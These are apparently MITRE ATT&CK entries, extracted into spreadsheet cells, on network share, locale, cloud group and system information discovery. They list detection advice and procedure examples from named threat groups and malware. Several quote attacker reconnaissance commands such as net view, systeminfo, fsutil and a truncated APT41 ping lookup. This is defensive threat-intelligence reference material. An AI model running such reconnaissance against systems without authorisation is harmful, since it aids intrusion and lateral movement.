Monitor for API calls that may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.
Process Creation
Monitor for newly executed processes that may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement.
Operating System Configuration
Enable Windows Group Policy “Do Not Allow Anonymous Enumeration of SAM Accounts and Shares” security setting to limit users who can enumerate network shares.(Citation: Windows Anonymous Enumeration of SAM Accounts)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors executed the PowerView ShareFinder module to identify open shares.(Citation: DFIR Conti Bazar Nov 2021)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `net share` command as part of their advanced reconnaissance.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered network disks mounted to the system using [netstat](https://attack.mitre.org/software/S0104).(Citation: FoxIT Wocao December 2019)
APT1
[APT1](https://attack.mitre.org/groups/G0006) listed connected network shares.(Citation: Mandiant APT1)
APT32
[APT32](https://attack.mitre.org/groups/G0050) used the &lt;code&gt;net view&lt;/code&gt; command to show all shares available, including the administrative shares such as &lt;code&gt;C$&lt;/code&gt; and &lt;code&gt;ADMIN$&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has enumerated network shares on a compromised host.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used the post exploitation tool [CrackMapExec](https://attack.mitre.org/software/S0488) to enumerate network shares.(Citation: BitDefender Chafer May 2020)
APT41
 [APT41](https://attack.mitre.org/groups/G0096) used the &lt;code&gt;net share&lt;/code&gt; command as part of network reconnaissance.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used &lt;code&gt;net share&lt;/code&gt; and &lt;code&gt;net view&lt;/code&gt; to identify network shares of interest.(Citation: NCC Group Chimera January 2021)
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) scanned the network for public shared folders.(Citation: Securelist DarkVishnya Dec 2018)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has identified and browsed file servers in the victim network, sometimes , viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.(Citation: US-CERT TA18-074A)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has executed net view commands for enumeration of open shares on compromised machines.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
Sowbug
[Sowbug](https://attack.mitre.org/groups/G0054) listed remote shared drives that were accessible from a victim.(Citation: Symantec Sowbug Nov 2017)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has used tools such as [NBTscan](https://attack.mitre.org/software/S0590) to enumerate network shares.(Citation: TrendMicro Tonto Team October 2020)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) used &lt;code&gt;netview&lt;/code&gt; to scan target systems for shared resources.(Citation: TrendMicro TropicTrooper 2015)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the “net view” command to locate mapped network shares.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) has enumerated shared folders and mapped volumes.(Citation: Arxiv Avaddon Feb 2021)
AvosLocker
[AvosLocker](https://attack.mitre.org/software/S1053) has enumerated shared drives on a compromised network.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Joint CSA AvosLocker Mar 2022)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can check a user's access to the C$ share on a compromised machine.(Citation: BitDefender BADHATCH Mar 2021) 
Babuk
[Babuk](https://attack.mitre.org/software/S0638) has the ability to enumerate network shares.(Citation: Sogeti CERT ESEC Babuk March 2021)
Bad Rabbit
[Bad Rabbit](https://attack.mitre.org/software/S0606) enumerates open SMB shares on internal victim networks.(Citation: ESET Bad Rabbit)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can enumerate shared drives on the domain.(Citation: NCC Group Team9 June 2020)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can search for network shares on the domain or workgroup using &lt;code&gt;net view &lt;host&gt;&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) has the ability to discover network shares on compromised networks.(Citation: Microsoft BlackCat Jun 2022)(Citation: Sophos BlackCat Jul 2022)
Clambling
[Clambling](https://attack.mitre.org/software/S0660) has the ability to enumerate network shares.(Citation: Trend Micro DRBControl February 2020)
Clop
[Clop](https://attack.mitre.org/software/S0611) can enumerate network shares.(Citation: Mcafee Clop Aug 2019)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can query shared drives on the local system.(Citation: Cobalt Strike TTPs Dec 2017)
Conti
[Conti](https://attack.mitre.org/software/S0575) can enumerate remote open SMB network shares using &lt;code&gt;NetShareEnum()&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)(Citation: CrowdStrike Wizard Spider October 2020)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can enumerate the shared folders and associated permissions for a targeted network.(Citation: CME Github September 2018)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) can discover shared resources using the &lt;code&gt;NetShareEnum&lt;/code&gt; API call.(Citation: McAfee Cuba April 2021) 
DEATHRANSOM
[DEATHRANSOM](https://attack.mitre.org/software/S0616) has the ability to use loop operations to enumerate network resources.(Citation: FireEye FiveHands April 2021)
Diavol
[Diavol](https://attack.mitre.org/software/S0659) has a `ENMDSKS` command to enumerates available network shares.(Citation: Fortinet Diavol July 2021) 
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has enumerated non-hidden network shares using `WNetEnumResourceW`. (Citation: Binary Defense Emotes Wi-Fi Spreader)
Empire
[Empire](https://attack.mitre.org/software/S0363) can find shared drives on the local system.(Citation: Github PowerShell Empire)
FIVEHANDS
[FIVEHANDS](https://attack.mitre.org/software/S0618) can enumerate network shares and mounted drives on a network.(Citation: NCC Group Fivehands June 2021)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) has been used to execute `net view` to discover mapped network shares.(Citation: NTT Security Flagpro new December 2021)
HELLOKITTY
[HELLOKITTY](https://attack.mitre.org/software/S0617) has the ability to enumerate network resources.(Citation: FireEye FiveHands April 2021)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can gather network share information.(Citation: ESET InvisiMole June 2018)
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) can use [netstat](https://attack.mitre.org/software/S0104) and [Net](https://attack.mitre.org/software/S0039) to discover network shares.(Citation: Mandiant Suspected Turla Campaign February 2023)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can scan local network for open SMB.(Citation: Github Koadic)
Kwampirs
[Kwampirs](https://attack.mitre.org/software/S0236) collects a list of network shares with the command &lt;code&gt;net share&lt;/code&gt;.(Citation: Symantec Orangeworm April 2018)
MURKYTOP
[MURKYTOP](https://attack.mitre.org/software/S0233) has the capability to retrieve information about shares on remote hosts.(Citation: FireEye Periscope March 2018)
Net
The &lt;code&gt;net view \\remotesystem&lt;/code&gt; and &lt;code&gt;net share&lt;/code&gt; commands in [Net](https://attack.mitre.org/software/S0039) can be used to find shared drives and directories on remote and local systems respectively.(Citation: Savill 1999)
OSInfo
[OSInfo](https://attack.mitre.org/software/S0165) discovers shares on the network(Citation: Symantec Buckeye)
Olympic Destroyer
[Olympic Destroyer](https://attack.mitre.org/software/S0365) will attempt to enumerate mapped network shares to later attempt to wipe all files on those shares.(Citation: Talos Olympic Destroyer 2018)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) has a module to enumerate network shares.(Citation: CIRCL PlugX March 2013)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can list local and remote shared drives and folders over SMB.(Citation: GitHub Pupy)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use &lt;code&gt;net share&lt;/code&gt; to identify network shares for use in lateral movement.(Citation: Trend Micro Qakbot May 2020)(Citation: Kaspersky QakBot September 2021)
QuietSieve
[QuietSieve](https://attack.mitre.org/software/S0686) can identify and search networked drives for specific file name extensions.(Citation: Microsoft Actinium February 2022)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can scan for network drives which may contain documents for collection.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	
Royal
[Royal](https://attack.mitre.org/software/S1073) can enumerate the shared resources of a given IP addresses using the API call `NetShareEnum`.(Citation: Cybereason Royal December 2022)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can enumerate shares on a compromised host.(Citation: GitHub SILENTTRINITY Modules July 2019)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has the ability to execute the `net view` command.(Citation: Bitdefender Sardonic Aug 2021)
ShimRat
[ShimRat](https://attack.mitre.org/software/S0444) can enumerate connected drives for infected host machines.(Citation: FOX-IT May 2016 Mofang)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) enumerates the directories of a network resource.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) module shareDll/mshareDll discovers network shares via the WNetOpenEnumA API.(Citation: ESET Trickbot Oct 2020)(Citation: Bitdefender Trickbot March 2020)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) can identify network adjacent and accessible drives.(Citation: Sentinel Labs WastedLocker July 2020)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can enumerate connected remote logical drives.(Citation: Cisco Ukraine Wipers January 2022)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) identifies network drives when they are added to victim systems.(Citation: Securelist Sofacy Feb 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may gather information in an attempt to calculate the geographical location of a victim host.
OS API Execution
Remote access tools with built-in features may interact directly with the Windows API, such as calling &lt;code&gt; GetLocaleInfoW&lt;/code&gt; to gather information.(Citation: FBI Ragnar Locker 2020)
Process Creation
Monitor newly executed processes that may gather information in an attempt to calculate the geographical location of a victim host.
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has identified the country location of a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) does not run any tasks or install additional malware if the victim machine is based in Russia.(Citation: BlackBerry Amadey 2020)
Crimson
[Crimson](https://attack.mitre.org/software/S0115) can identify the geographical location of a victim host.(Citation: Kaspersky Transparent Tribe August 2020)	 
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can identity the OS locale of a compromised host.(Citation: Prevailion DarkWatchman 2021)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can identify the country code on a compromised host.(Citation: Group IB GrimAgent July 2021)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) can determine the country a victim host is located in.(Citation: CISA AR18-352A Quasar RAT December 2018)
Ragnar Locker
Before executing malicious code, [Ragnar Locker](https://attack.mitre.org/software/S0481) checks the Windows API &lt;code&gt;GetLocaleInfoW&lt;/code&gt; and doesn't encrypt files if it finds a former Soviet country.(Citation: FBI Ragnar Locker 2020)
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) can collected the country code of a compromised machine.(Citation: Korean FSI TA505 2020)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has conducted system locale checks to see if the compromised host is in Russia, Ukraine, Belarus, Armenia, Kazakhstan, or Moldova.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for events collected that may attempt to find cloud groups and permission settings. 
Command Execution
Monitor for executed commands and arguments that may attempt to find cloud groups and permission settings. 
Group Enumeration
Monitor for an extracted list of available groups and/or their associated setting 
Group Metadata
Contextual data about a group which describes group and activity around it that may attempt to find cloud groups and permission settings. 
Process Creation
Monitor newly executed processes that may attempt to find cloud groups and permission settings.
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) accessed Azure AD to download bulk lists of group members and their Active Directory attributes.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can enumerate Azure AD groups.(Citation: AADInternals Documentation)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can enumerate IAM permissions.(Citation: GitHub Pacu)
ROADTools
[ROADTools](https://attack.mitre.org/software/S0684) can enumerate Azure AD groups.(Citation: Roadtools)	
</t>
  </si>
  <si>
    <t>Command Execution
Monitor executed commands and arguments that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. For network devices, monitor executed commands in AAA logs, especially those run by unexpected or unauthorized users.
OS API Execution
Monitor for API calls that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.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In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.
Process Creation
Monitor newly executed processes that may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) issued `ping -n 1 ((cmd /c dir c:\|findstr Number).split()[-1]+` commands to find the volume serial number of compromised systems.(Citation: Mandiant APT41)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used [Empire](https://attack.mitre.org/software/S0363) to obtain the compromised machine's name.(Citation: Talos Frankenstein June 2019)
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used [Systeminfo](https://attack.mitre.org/software/S0096) to collect information on targeted hosts.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors used the `systeminfo` command to gather details about a compromised system.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Honeybee
During [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors collected the computer name, OS, and other system information using `cmd /c systeminfo &gt; %temp%\ temp.ini`.(Citation: McAfee Honeybee)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors discovered the local disks attached to the system and their hardware information including manufacturer and model, as well as the OS versions of systems connected to a targeted network.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used `fsutil` to check available free space before executing actions that might create large files on disk.(Citation: Microsoft Deep Dive Solorigate January 2021)
APT18
[APT18](https://attack.mitre.org/groups/G0026) can collect system information from the victim’s machine.(Citation: PaloAlto DNS Requests May 2016)
APT19
[APT19](https://attack.mitre.org/groups/G0073) collected system architecture information. [APT19](https://attack.mitre.org/groups/G0073) used an HTTP malware variant and a Port 22 malware variant to gather the hostname and CPU information from the victim’s machine.(Citation: FireEye APT19)(Citation: Unit 42 C0d0so0 Jan 2016)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has a tool that can obtain information about the local system.(Citation: Symantec Buckeye)(Citation: evolution of pirpi)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&amp;C server. [APT32](https://attack.mitre.org/groups/G0050) executed shellcode to identify the name of the infected host.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)(Citation: FireEye APT32 April 2020)
APT37
[APT37](https://attack.mitre.org/groups/G0067) collects the computer name, the BIOS model, and execution path.(Citation: Talos Group123)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has attempted to get detailed information about a compromised host, including the operating system, version, patches, hotfixes, and service packs.(Citation: CISA AA20-239A BeagleBoyz August 2020)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has used native OS commands to understand privilege levels and system details.(Citation: CrowdStrike AQUATIC PANDA December 2021)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has collected hardware details for the victim's system, including CPU and memory information.(Citation: RedCanary Mockingbird May 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used `fsutil fsinfo drives`, `systeminfo`, and `vssadmin list shadows` for system information including shadow volumes and drive information.(Citation: NCC Group Chimera January 2021)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has used a file stealer that can examine system drives, including those other than the C drive.(Citation: TrendMicro Confucius APT Aug 2021)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has collected the hostname, OS version, service pack version, and the processor architecture from the victim’s machine.(Citation: Securelist Darkhotel Aug 2015)(Citation: Microsoft DUBNIUM July 2016)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has collected local host information by utilizing Windows commands `systeminfo`, `fsutil`, and `fsinfo`. [FIN13](https://attack.mitre.org/groups/G1016) has also utilized a compromised Symantex Altiris console and LanDesk account to retrieve host information.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has used PowerShell Scripts to check the architecture of a compromised machine before the selection of a 32-bit or 64-bit version of a malicious .NET loader.(Citation: Symantec FIN8 Jul 2023)
Gamaredon Group
A [Gamaredon Group](https://attack.mitre.org/groups/G0047) file stealer can gather the victim's computer name and drive serial numbers to send to a C2 server.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: TrendMicro Gamaredon April 2020)(Citation: CERT-EE Gamaredon January 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has collected the hostname of a compromised machine.(Citation: Kaspersky Lyceum October 2021)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) collected the system volume serial number, GUID, and computer name.(Citation: PTSecurity Higaisa 2020)(Citation: Malwarebytes Higaisa 2020)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to gather information about the operating system and hardware on the infected host.(Citation: Symantec Inception Framework March 2018)
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) performs operating system information discovery using &lt;code&gt;systeminfo&lt;/code&gt; and has used implants to identify the system language and computer name.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has enumerated drives, OS type, OS version, and other information using a script or the "systeminfo" command.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families collect information on the type and version of the victim OS, as well as the victim computer name and CPU information. A Destover-like variant used by [Lazarus Group](https://attack.mitre.org/groups/G0032) also collects disk space information and sends it to its C2 server.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: Novetta Blockbuster Loaders)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)(Citation: Lazarus APT January 2022)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) collected information about the infected host, including the machine names and OS architecture.(Citation: Checkpoint MosesStaff Nov 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can collect the victim’s OS version and machine name.(Citation: Securelist MuddyWater Oct 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has gathered system information using &lt;code&gt;systeminfo&lt;/code&gt;.(Citation: Avira Mustang Panda January 2020)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has run &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;systeminfo&lt;/code&gt; on a victim.(Citation: Palo Alto OilRig May 2016)(Citation: Palo Alto OilRig Oct 2016)(Citation: FireEye APT34 July 2019)(Citation: Check Point APT34 April 2021)	
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) collected the victim computer name, OS version, and architecture type and sent the information to its C2 server. [Patchwork](https://attack.mitre.org/groups/G0040) also enumerated all available drives on the victim's machine.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has used uname -m to collect the name and information about the infected system's kernel.(Citation: Anomali Rocke March 2019)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) used a backdoor to enumerate information about the infected system's operating system.(Citation: ESET Telebots July 2017)(Citation: US District Court Indictment GRU Unit 74455 October 2020)	
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has identified the OS version of a compromised host.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used tools to collect the computer name, OS version, installed hotfixes, as well as information regarding the memory and processor on a compromised host.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder COVID-19 June 2020)
Sowbug
[Sowbug](https://attack.mitre.org/groups/G0054) obtained OS version and hardware configuration from a victim.(Citation: Symantec Sowbug Nov 2017)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware gathers system information via WMI, including the system directory, build number, serial number, version, manufacturer, model, and total physical memory.(Citation: Citizen Lab Stealth Falcon May 2016)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has collected system information prior to downloading malware on the targeted host.(Citation: Proofpoint TA2541 February 2022)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has searched for system version, architecture, disk partition, logical volume, and hostname information.(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Cisco Talos Intelligence Group)
Tropic Trooper
[Tropic Trooper](https://attack.mitre.org/groups/G0081) has detected a target system’s OS version and system volume information.(Citation: TrendMicro TropicTrooper 2015)(Citation: TrendMicro Tropic Trooper May 2020)
Turla
[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover operating system configuration details using the &lt;code&gt;systeminfo&lt;/code&gt; and &lt;code&gt;set&lt;/code&gt; commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has discovered file system types, drive names, size, and free space on compromised systems.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)
Windigo
[Windigo](https://attack.mitre.org/groups/G0124) has used a script to detect which Linux distribution and version is currently installed on the system.(Citation: ESET ForSSHe December 2018)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used malware to identify the computer name of a compromised host.(Citation: BlackBerry Bahamut)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used [Systeminfo](https://attack.mitre.org/software/S0096) and similar commands to acquire detailed configuration information of a victim's machine. [Wizard Spider](https://attack.mitre.org/groups/G0102) has also utilized the PowerShell cmdlet `Get-ADComputer` to collect DNS hostnames, last logon dates, and operating system information from Active Directory.(Citation: DFIR Ryuk's Return October 2020)(Citation: Mandiant FIN12 Oct 2021)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used a tool to capture the processor architecture of a compromised host in order to register it with C2.(Citation: Zscaler APT31 Covid-19 October 2020)
admin@338
[admin@338](https://attack.mitre.org/groups/G0018) actors used the following commands after exploiting a machine with [LOWBALL](https://attack.mitre.org/software/S0042) malware to obtain information about the OS: &lt;code&gt;ver &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;systeminfo &gt;&gt; %temp%\download&lt;/code&gt;(Citation: FireEye admin@338)
4H RAT
[4H RAT](https://attack.mitre.org/software/S0065) sends an OS version identifier in its beacons.(Citation: CrowdStrike Putter Panda)
ADVSTORESHELL
[ADVSTORESHELL](https://attack.mitre.org/software/S0045) can run [Systeminfo](https://attack.mitre.org/software/S0096) to gather information about the victim.(Citation: ESET Sednit Part 2)(Citation: Bitdefender APT28 Dec 2015)
Action RAT
[Action RAT](https://attack.mitre.org/software/S1028) has the ability to collect the hostname, OS version, and OS architecture of an infected host.(Citation: MalwareBytes SideCopy Dec 2021)
Agent Tesla
[Agent Tesla](https://attack.mitre.org/software/S0331) can collect the system's computer name and also has the capability to collect information on the processor, memory, OS, and video card from the system.(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Malwarebytes Agent Tesla April 2020)
Amadey
[Amadey](https://attack.mitre.org/software/S1025) has collected the computer name and OS version from a compromised machine.(Citation: Korean FSI TA505 2020)(Citation: BlackBerry Amadey 2020)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can determine the hostname and linux version on a compromised host.(Citation: Medium Anchor DNS July 2020)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has collected the victim host information after infection.(Citation: CISA AppleJeus Feb 2021)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) can identify the OS version of a targeted system.(Citation: Malwarebytes Kimsuky June 2021)
Aria-body
[Aria-body](https://attack.mitre.org/software/S0456) has the ability to identify the hostname, computer name, Windows version, processor speed, machine GUID, and disk information on a compromised host.(Citation: CheckPoint Naikon May 2020)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) collects the machine name and keyboard language from the system. (Citation: Cofense Astaroth Sept 2018)(Citation: Cybereason Astaroth Feb 2019)
AsyncRAT
[AsyncRAT](https://attack.mitre.org/software/S1087) can check the disk size through the values obtained with `DeviceInfo.`(Citation: Telefonica Snip3 December 2021)
Attor
[Attor](https://attack.mitre.org/software/S0438) monitors the free disk space on the system.(Citation: ESET Attor Oct 2019)
AuTo Stealer
[AuTo Stealer](https://attack.mitre.org/software/S1029) has the ability to collect the hostname and OS information from an infected host.(Citation: MalwareBytes SideCopy Dec 2021)
Avenger
[Avenger](https://attack.mitre.org/software/S0473) has the ability to identify the host volume ID and the OS architecture on a compromised host.(Citation: Trend Micro Tick November 2019)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)
BACKSPACE
During its initial execution, [BACKSPACE](https://attack.mitre.org/software/S0031) extracts operating system information from the infected host.(Citation: FireEye APT30)
BADCALL
[BADCALL](https://attack.mitre.org/software/S0245) collects the computer name and host name on the compromised system.(Citation: US-CERT BADCALL)
BADFLICK
[BADFLICK](https://attack.mitre.org/software/S0642) has captured victim computer name, memory space, and CPU details.(Citation: Accenture MUDCARP March 2019)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can obtain current system information from a compromised machine such as the `SHELL PID`, `PSVERSION`, `HOSTNAME`, `LOGONSERVER`, `LASTBOOTUP`, `UPTIME`, drive information, OS type/version, bitness, and hostname.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021) 
BISCUIT
[BISCUIT](https://attack.mitre.org/software/S0017) has a command to collect the processor type, operation system, computer name, uptime, and whether the system is a laptop or PC.(Citation: Mandiant APT1 Appendix)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has collected from a victim machine the system name, processor information, OS version, and disk information, including type and free space available.(Citation: US-CERT BLINDINGCAN Aug 2020)
BLUELIGHT
[BLUELIGHT](https://attack.mitre.org/software/S0657) has collected the computer name and OS version from victim machines.(Citation: Volexity InkySquid BLUELIGHT August 2021)
BUBBLEWRAP
[BUBBLEWRAP](https://attack.mitre.org/software/S0043) collects system information, including the operating system version and hostname.(Citation: FireEye admin@338)
Babuk
[Babuk](https://attack.mitre.org/software/S0638) can enumerate disk volumes, get disk information, and query service status.(Citation: McAfee Babuk February 2021)
BabyShark
[BabyShark](https://attack.mitre.org/software/S0414) has executed the &lt;code&gt;ver&lt;/code&gt; command.(Citation: Unit42 BabyShark Feb 2019)	
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has the ability to gather the victim's computer name.(Citation: Unit 42 BackConfig May 2020)
Backdoor.Oldrea
[Backdoor.Oldrea](https://attack.mitre.org/software/S0093) collects information about the OS and computer name.(Citation: Symantec Dragonfly)(Citation: Gigamon Berserk Bear October 2021)
BadPatch
[BadPatch](https://attack.mitre.org/software/S0337) collects the OS system, OS version, MAC address, and the computer name from the victim’s machine.(Citation: Unit 42 BadPatch Oct 2017)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) can collect information about the drives available on the system.(Citation: CheckPoint Bandook Nov 2020) 
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) gathers system information, network addresses, disk type, disk free space, and the operation system version.(Citation: McAfee Bankshot)(Citation: US-CERT Bankshot Dec 2017)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can fingerprint architecture, computer name, and OS version on the compromised host. [Bazar](https://attack.mitre.org/software/S0534) can also check if the Russian language is installed on the infected machine and terminate if it is found.(Citation: Cybereason Bazar July 2020)(Citation: NCC Group Team9 June 2020)
